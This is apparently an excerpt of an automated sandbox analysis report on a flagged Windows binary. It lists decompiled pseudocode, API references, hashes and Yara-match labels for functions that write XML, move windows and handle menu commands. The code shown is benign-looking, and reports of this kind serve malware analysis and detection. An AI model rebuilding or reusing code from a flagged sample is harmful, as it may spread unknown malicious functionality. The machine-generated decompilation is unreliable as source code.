						_t83 = _t83 - 1;
						_t93 = _t83;
						 *((char*)(_t84 + _v8 - 0xc28)) = _t69;
					} while (_t83 != 0);
					goto L7;
				}
			}






























                                                                                              0x00407412
                                                                                              0x00407415
                                                                                              0x0040741a
                                                                                              0x0040741c
                                                                                              0x00407422
                                                                                              0x00407428
                                                                                              0x00407428
                                                                                              0x00407428
                                                                                              0x00407429
                                                                                              0x0040754a
                                                                                              0x00407438
                                                                                              0x00407446
                                                                                              0x0040744d
                                                                                              0x00407455
                                                                                              0x00407459
                                                                                              0x00407461
                                                                                              0x00407467
                                                                                              0x0040749b
                                                                                              0x0040749b
                                                                                              0x004074a1
                                                                                              0x004074ad
                                                                                              0x004074b6
                                                                                              0x004074bf
                                                                                              0x004074d0
                                                                                              0x004074d7
                                                                                              0x004074e1
                                                                                              0x004074e3
                                                                                              0x004074ed
                                                                                              0x004074ef
                                                                                              0x004074ef
                                                                                              0x004074fc
                                                                                              0x00407503
                                                                                              0x0040750a
                                                                                              0x0040750f
                                                                                              0x00407512
                                                                                              0x00407518
                                                                                              0x00407520
                                                                                              0x00407530
                                                                                              0x00407535
                                                                                              0x00407535
                                                                                              0x004074e1
                                                                                              0x00000000
                                                                                              0x00407541
                                                                                              0x0040746e
                                                                                              0x00407471
                                                                                              0x00407472
                                                                                              0x00407484
                                                                                              0x00407486
                                                                                              0x0040748d
                                                                                              0x0040748e
                                                                                              0x00407491
                                                                                              0x00407491
                                                                                              0x00407492
                                                                                              0x00407492
                                                                                              0x00000000
                                                                                              0x00407472

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeLocalmemcpymemsetstrlen
                                                                                              • String ID: &v@
                                                                                              • API String ID: 3110682361-3426253984
                                                                                              • Opcode ID: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                                                              • Instruction ID: 0225f7a5d6cb17f6a7661d1d380ab710e59dbb599c3936da0c6da93344c8566d
                                                                                              • Opcode Fuzzy Hash: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                                                              • Instruction Fuzzy Hash: B731F772D0411DABDB10DB68CC81BDEBBB8EF45318F1001B6E645B3281DA78AE858B95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409695, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 84%
                                                                                              			E00409695(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v259;
				char _v260;
				signed int _t34;
				char* _t45;
				void* _t47;

				E00405EFD(_a4, "<item>\r\n");
				_t34 = 0;
				if( *((intOrPtr*)(__edi + 0x20)) > 0) {
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						E0040F09D( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4),  *((intOrPtr*)(__edi + 0x4c))),  *((intOrPtr*)(__edi + 0x50)));
						_t45 =  &_v260;
						E00409018(_t45,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
						sprintf( *(__edi + 0x54), "<%s>%s</%s>\r\n", _t45,  *((intOrPtr*)(__edi + 0x50)), _t45);
						E00405EFD(_a4,  *(__edi + 0x54));
						_t47 = _t47 + 0x28;
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__edi + 0x20)));
				}
				return E00405EFD(_a4, "</item>\r\n");
			}








                                                                                              0x004096a7
                                                                                              0x004096ac
                                                                                              0x004096b3
                                                                                              0x004096b6
                                                                                              0x004096c4
                                                                                              0x004096cb
                                                                                              0x004096e7
                                                                                              0x004096f6
                                                                                              0x004096fc
                                                                                              0x00409710
                                                                                              0x0040971b
                                                                                              0x00409720
                                                                                              0x00409723
                                                                                              0x00409724
                                                                                              0x00409729
                                                                                              0x0040973b

                                                                                              APIs
                                                                                                • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                              • memset.MSVCRT ref: 004096CB
                                                                                                • Part of subcall function 0040F09D: memcpy.MSVCRT ref: 0040F10B
                                                                                                • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                                • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                              • sprintf.MSVCRT ref: 00409710
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileWrite_strlwrmemcpymemsetsprintfstrcpystrlen
                                                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                                                              • API String ID: 3200591283-2769808009
                                                                                              • Opcode ID: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                                                              • Instruction ID: f0c093cdac9801847eaa7418f237768de61d650e358e632480a4b045718b8cde
                                                                                              • Opcode Fuzzy Hash: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                                                              • Instruction Fuzzy Hash: FE11E731500515BFC711AF25CC42E967B64FF04318F10006AF549369A2EB76BA64DFD8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407BF9, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00407BF9(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00406560(_t30);
				}
				return 1;
			}









                                                                                              0x00407c04
                                                                                              0x00407c07
                                                                                              0x00407c11
                                                                                              0x00407c18
                                                                                              0x00407c23
                                                                                              0x00407c33
                                                                                              0x00407c41
                                                                                              0x00407c49
                                                                                              0x00407c4f
                                                                                              0x00407c55
                                                                                              0x00407c5a
                                                                                              0x00407c5d
                                                                                              0x00407c62
                                                                                              0x00407c68

                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 00407C0B
                                                                                              • GetWindowRect.USER32 ref: 00407C18
                                                                                              • GetClientRect.USER32 ref: 00407C23
                                                                                              • MapWindowPoints.USER32 ref: 00407C33
                                                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00407C4F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$ClientParentPoints
                                                                                              • String ID:
                                                                                              • API String ID: 4247780290-0
                                                                                              • Opcode ID: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                                                              • Instruction ID: 06ac4e87c023cdd11bbb76a881eefb098f7857fbb12a9e12d40a619b69e20d01
                                                                                              • Opcode Fuzzy Hash: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                                                              • Instruction Fuzzy Hash: A7014C32800129BBDB119BA5DD89EFF7FBCEF46750F048129F901E2150D7B89541CBA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A4C8, Relevance: 7.5, APIs: 5, Instructions: 47windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040A4C8(void* __eax) {
				void* __esi;
				void* _t16;
				void* _t33;
				void* _t38;
				void* _t41;

				_t41 = __eax;
				_t16 = E00401033();
				if(_t16 == 0x5cb8) {
					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 0, 0);
					E00405E2C();
					 *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)) + 0x28)) = 0;
					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0x1009, 0, 0);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x5c))(_t38, _t33);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x74))(1);
					E0040A437(_t41);
					SetCursor( *0x416b98);
					SetFocus( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184));
					return SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 1, 0);
				}
				return _t16;
			}








                                                                                              0x0040a4c9
                                                                                              0x0040a4cb
                                                                                              0x0040a4d5
                                                                                              0x0040a4f5
                                                                                              0x0040a4f7
                                                                                              0x0040a504
                                                                                              0x0040a518
                                                                                              0x0040a522
                                                                                              0x0040a52f
                                                                                              0x0040a532
                                                                                              0x0040a53d
                                                                                              0x0040a54f
                                                                                              0x00000000
                                                                                              0x0040a569
                                                                                              0x0040a56b

                                                                                              APIs
                                                                                              • SendMessageA.USER32 ref: 0040A4F5
                                                                                                • Part of subcall function 00405E2C: LoadCursorA.USER32 ref: 00405E33
                                                                                                • Part of subcall function 00405E2C: SetCursor.USER32(00000000,?,0040BAC6), ref: 00405E3A
                                                                                              • SendMessageA.USER32 ref: 0040A518
                                                                                                • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A45D
                                                                                                • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A487
                                                                                                • Part of subcall function 0040A437: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                                                                • Part of subcall function 0040A437: SendMessageA.USER32 ref: 0040A4C0
                                                                                              • SetCursor.USER32(?,?,0040B6B6), ref: 0040A53D
                                                                                              • SetFocus.USER32(?,?,?,0040B6B6), ref: 0040A54F
                                                                                              • SendMessageA.USER32 ref: 0040A566
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 2210206837-0
                                                                                              • Opcode ID: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                                                              • Instruction ID: 5ceab2a0550c6f7be61398745e2f8fe4621b0361104972d0b8848fcf02267a2c
                                                                                              • Opcode Fuzzy Hash: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                                                              • Instruction Fuzzy Hash: 12116DB1200600EFD722AB74DC85FAA77EDFF48344F0644B9F1599B2B1CA716D018B10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409867, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00409867(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				char* _t28;

				_t26 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				E00405EFD(_a4, "<?xml version=\"1.0\"  encoding=\"ISO-8859-1\" ?>\r\n");
				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
				_t28 =  &_v260;
				E00409018(_t28, _t17);
				sprintf( &_v516, "<%s>\r\n", _t28);
				return E00405EFD(_a4,  &_v516);
			}











                                                                                              0x00409881
                                                                                              0x00409883
                                                                                              0x0040988a
                                                                                              0x00409899
                                                                                              0x004098a0
                                                                                              0x004098ad
                                                                                              0x004098b9
                                                                                              0x004098bd
                                                                                              0x004098c3
                                                                                              0x004098d7
                                                                                              0x004098f1

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040988A
                                                                                              • memset.MSVCRT ref: 004098A0
                                                                                                • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                                • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                                • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                              • sprintf.MSVCRT ref: 004098D7
                                                                                              Strings
                                                                                              • <%s>, xrefs: 004098D1
                                                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 004098A5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                              • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                              • API String ID: 3202206310-1998499579
                                                                                              • Opcode ID: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                                                              • Instruction ID: 66925a684df18266fce8bb701fa3a75b356ea9bacad4fe0319972b489c667c97
                                                                                              • Opcode Fuzzy Hash: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                                                              • Instruction Fuzzy Hash: BC01A77290011976D721A759CC46FDA7B6C9F44304F0400FAB509B3192DB789F858BA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00408572, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 76%
                                                                                              			E00408572(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x24));
				if(_t9 != 0) {
					_push(_t9);
					L004115D6();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x34));
				if(_t10 != 0) {
					_push(_t10);
					L004115D6();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x1b4));
				if(_t11 != 0) {
					_push(_t11);
					L004115D6();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x1a0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L004115D6();
						 *_t18 = 0;
					}
					_push(_t18);
					L004115D6();
				}
				 *((intOrPtr*)(_t19 + 0x1a0)) = 0;
				 *((intOrPtr*)(_t19 + 0x24)) = 0;
				 *((intOrPtr*)(_t19 + 0x34)) = 0;
				 *((intOrPtr*)(_t19 + 0x1b4)) = 0;
				return _t11;
			}








                                                                                              0x00408572
                                                                                              0x00408572
                                                                                              0x0040857b
                                                                                              0x0040857d
                                                                                              0x0040857e
                                                                                              0x00408583
                                                                                              0x00408584
                                                                                              0x00408589
                                                                                              0x0040858b
                                                                                              0x0040858c
                                                                                              0x00408591
                                                                                              0x00408592
                                                                                              0x0040859a
                                                                                              0x0040859c
                                                                                              0x0040859d
                                                                                              0x004085a2
                                                                                              0x004085a3
                                                                                              0x004085ab
                                                                                              0x004085ad
                                                                                              0x004085b1
                                                                                              0x004085b3
                                                                                              0x004085b4
                                                                                              0x004085ba
                                                                                              0x004085ba
                                                                                              0x004085bc
                                                                                              0x004085bd
                                                                                              0x004085c2
                                                                                              0x004085c4
                                                                                              0x004085ca
                                                                                              0x004085cd
                                                                                              0x004085d0
                                                                                              0x004085d7

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                              • Instruction ID: 0a64c6e0650ef7a992325d71cca8afebdafc0e64b7e6075a64aa0ecb46f153ec
                                                                                              • Opcode Fuzzy Hash: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                              • Instruction Fuzzy Hash: C2F0F4725057016FDB209F6A99C0497B7D6BB48714B64083FF18AD3741CF78AD818A18
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004085D8, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 70%
                                                                                              			E004085D8(intOrPtr* __edi) {
				void* __esi;
				void** _t7;
				intOrPtr* _t12;
				intOrPtr* _t18;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;

				_t18 = __edi;
				 *__edi = 0x413320;
				E00408572(__edi);
				_t21 =  *((intOrPtr*)(__edi + 0x10));
				if(_t21 != 0) {
					E00406B5B(_t21);
					_push(_t21);
					L004115D6();
				}
				_t22 =  *((intOrPtr*)(_t18 + 0xc));
				if(_t22 != 0) {
					E00406B5B(_t22);
					_push(_t22);
					L004115D6();
				}
				_t23 =  *((intOrPtr*)(_t18 + 8));
				if(_t23 != 0) {
					E00406B5B(_t23);
					_push(_t23);
					L004115D6();
				}
				_t24 =  *((intOrPtr*)(_t18 + 4));
				if(_t24 != 0) {
					E00406B5B(_t24);
					_push(_t24);
					L004115D6();
				}
				_t12 = _t18;
				_t7 =  *((intOrPtr*)( *_t12))();
				free( *_t7);
				return _t7;
			}











                                                                                              0x004085d8
                                                                                              0x004085db
                                                                                              0x004085e1
                                                                                              0x004085e6
                                                                                              0x004085eb
                                                                                              0x004085ed
                                                                                              0x004085f2
                                                                                              0x004085f3
                                                                                              0x004085f8
                                                                                              0x004085f9
                                                                                              0x004085fe
                                                                                              0x00408600
                                                                                              0x00408605
                                                                                              0x00408606
                                                                                              0x0040860b
                                                                                              0x0040860c
                                                                                              0x00408611
                                                                                              0x00408613
                                                                                              0x00408618
                                                                                              0x00408619
                                                                                              0x0040861e
                                                                                              0x0040861f
                                                                                              0x00408624
                                                                                              0x00408626
                                                                                              0x0040862b
                                                                                              0x0040862c
                                                                                              0x00408631
                                                                                              0x00408632
                                                                                              0x0040863c
                                                                                              0x00408640
                                                                                              0x00408646

                                                                                              APIs
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004085F3
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00408606
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00408619
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040862C
                                                                                              • free.MSVCRT(00000000), ref: 00408640
                                                                                                • Part of subcall function 00406B5B: free.MSVCRT(00000000,00406DE2,00000000,?,?), ref: 00406B62
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??3@$free
                                                                                              • String ID:
                                                                                              • API String ID: 2241099983-0
                                                                                              • Opcode ID: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                                                              • Instruction ID: 9ddd328a78e70669a2f2a4495a49ad6ad9a3331e0dda25fcf26d4743fc91c851
                                                                                              • Opcode Fuzzy Hash: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                                                              • Instruction Fuzzy Hash: E3F0F6729028306BC9213B275011A8EB3657D4171431B056FF946BB7A28F3C6E9246FD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E81A, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 19%
                                                                                              			E0040E81A(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, intOrPtr _a12) {
				void* __esi;
				void* _t11;
				void* _t26;
				void* _t27;

				_t26 = __edx;
				_t11 = _a4 - 0x110;
				_t27 = __ecx;
				if(_t11 == 0) {
					E0040E4A4(__ecx, __ecx, __eflags);
					E00406491(_t26,  *((intOrPtr*)(__ecx + 4)));
					L5:
					return E004015AE(_t27, _a4, _a8, _a12);
				}
				if(_t11 != 0x28 || E004062D1(_a12) == 0) {
					goto L5;
				} else {
					SetBkMode(_a8, 1);
					SetBkColor(_a8, GetSysColor(5));
					SetTextColor(_a8, 0xc00000);
					return GetSysColorBrush(5);
				}
			}







                                                                                              0x0040e81a
                                                                                              0x0040e820
                                                                                              0x0040e826
                                                                                              0x0040e828
                                                                                              0x0040e871
                                                                                              0x0040e879
                                                                                              0x0040e87f
                                                                                              0x00000000
                                                                                              0x0040e88a
                                                                                              0x0040e82d
                                                                                              0x00000000
                                                                                              0x0040e83c
                                                                                              0x0040e841
                                                                                              0x0040e853
                                                                                              0x0040e861
                                                                                              0x00000000
                                                                                              0x0040e869

                                                                                              APIs
                                                                                                • Part of subcall function 004062D1: memset.MSVCRT ref: 004062F1
                                                                                                • Part of subcall function 004062D1: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                                                                • Part of subcall function 004062D1: _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0040E841
                                                                                              • GetSysColor.USER32(00000005), ref: 0040E849
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 0040E853
                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 0040E861
                                                                                              • GetSysColorBrush.USER32(00000005), ref: 0040E869
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Color$BrushClassModeNameText_stricmpmemset
                                                                                              • String ID:
                                                                                              • API String ID: 1869857563-0
                                                                                              • Opcode ID: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                                                              • Instruction ID: 70d3a7b2db974a4d4567ef1bfe72cf66993607b5e30e9ab541cb73924f0fe55d
                                                                                              • Opcode Fuzzy Hash: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                                                              • Instruction Fuzzy Hash: 8CF01D32100205BBDF152FA6DD09E9E3F25EF08711F10C53AFA19A51E1CAB5D970DB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B105, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 82%
                                                                                              			E0040B105(intOrPtr __ecx, short _a4, short _a8) {
				char _v265;
				char _v520;
				char _v532;
				RECT* _v540;
				char _v560;
				intOrPtr _v564;
				char _v568;
				intOrPtr _v572;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t54;
				void* _t77;
				short _t85;
				short _t86;
				RECT* _t97;
				intOrPtr _t104;

				_t93 = __ecx;
				_t97 = 0;
				_t104 = __ecx;
				_v564 = __ecx;
				if(_a4 == 0 || _a4 == 1) {
					_t85 = _a8;
					if(_t85 == 0x9c42) {
						_t54 = DestroyWindow( *(_t104 + 0x108));
					}
					_t114 = _t85 - 0x9c49;
					if(_t85 == 0x9c49) {
						_t54 = E0040AEAA(_t93, _t97, _t104, _t114);
					}
					_t115 = _t85 - 0x9c59;
					if(_t85 == 0x9c59) {
						_t54 = E0040AE70(_t97, _t104, _t115);
					}
					_t116 = _t85 - 0x9c56;
					if(_t85 == 0x9c56) {
						_t54 = E0040ADB3(_t104, _t116);
					}
					if(_a8 == 0x9c58) {
						 *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) ^ 0x00000001;
						_t54 = E0040A27F(0, _t93, _t104, 0);
					}
					if(_a8 == 0x9c44) {
						_t54 = E0040AD9D(_t104);
					}
					if(_a8 == 0x9c43) {
						_v532 = 0x413560;
						E00401000(_t93,  &_v520, 0x412404);
						E00401000(_t93,  &_v265, 0x412440);
						_t104 = _v564;
						_push( *(_t104 + 0x108));
						_push( &_v532);
						_t77 = 0x70;
						E00401540(_t77);
						SetFocus( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
						_t20 =  &_v540; // 0x413560
						_t54 = E0040143D(_t20);
						_t97 = 0;
					}
					_t86 = _a8;
					_t122 = _t86 - 0x9c41;
					if(_t86 == 0x9c41) {
						_t54 = E0040AD38(_t104, _t93, _t122);
					}
					if(_t86 != 0x9c47) {
						L23:
						__eflags = _t86 - 0x9c4f;
						if(_t86 != 0x9c4f) {
							L27:
							__eflags = _t86 - 0x9c48;
							if(_t86 == 0x9c48) {
								_t54 = E0040AC8A(_t104, _t86);
							}
							__eflags = _t86 - 0x9c45;
							if(__eflags == 0) {
								_t100 = _t104 + 0x36c;
								 *( *(_t104 + 0x36c) + 4) =  *( *(_t104 + 0x36c) + 4) ^ 0x00000001;
								E0040A27F(0, _t93, _t104, __eflags);
								_t93 = 1;
								_t54 = E0040A00B( *((intOrPtr*)(_t104 + 0x370)), 1,  *((intOrPtr*)( *_t100 + 4)));
								_t97 = 0;
								__eflags = 0;
							}
							__eflags = _a8 - 0x9c46;
							if(__eflags == 0) {
								_t54 = E0040B095(_t104, __eflags, _t97);
							}
							__eflags = _a8 - 0x9c5c;
							if(_a8 == 0x9c5c) {
								 *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) ^ 0x00000001;
								__eflags = 0;
								E0040A27F(0, _t93, _t104, 0);
								E0040A437(_t104);
								_t54 = InvalidateRect( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184), _t97, _t97);
							}
							__eflags = _a8 - 0x9c4a;
							if(__eflags == 0) {
								_t54 = E0040B095(_t104, __eflags, 1);
							}
							__eflags = _a8 - 0x9c4b;
							if(_a8 == 0x9c4b) {
								_v540 = _t97;
								_v560 = 0x412ff4;
								E00405960( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b4)),  &_v560,  *(_t104 + 0x108),  *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
								_v568 = 0x412ff4;
								_t54 = E0040143D( &_v560);
								_t104 = _v572;
							}
							__eflags = _a8 - 0x9c4c;
							if(_a8 == 0x9c4c) {
								_t54 = E00408C3E( *((intOrPtr*)(_t104 + 0x370)));
							}
							__eflags = _a8 - 0x9c4e;
							if(_a8 == 0x9c4e) {
								_t54 = E00409C78( *((intOrPtr*)(_t104 + 0x370)),  *(_t104 + 0x108));
							}
							goto L43;
						}
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						__eflags =  *((intOrPtr*)(_t72 + 0x1b8)) - _t97;
						if( *((intOrPtr*)(_t72 + 0x1b8)) == _t97) {
							_t54 = E00408654(_t72, 0xffffffff, _t97, 2);
							goto L27;
						}
						_push(0xf000);
						_push(0x1000);
						goto L21;
					} else {
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b8)) == _t97) {
							_t54 = E00408654(_t72, 0xffffffff, 2, 2);
							goto L23;
						}
						_push(0xf000);
						_push(0x2000);
						L21:
						_push(0xffffffff);
						_t54 = E00408654(_t72);
						goto L43;
					}
				} else {
					L43:
					return _t54;
				}
			}




















                                                                                              0x0040b105
                                                                                              0x0040b114
                                                                                              0x0040b11a
                                                                                              0x0040b11c
                                                                                              0x0040b120
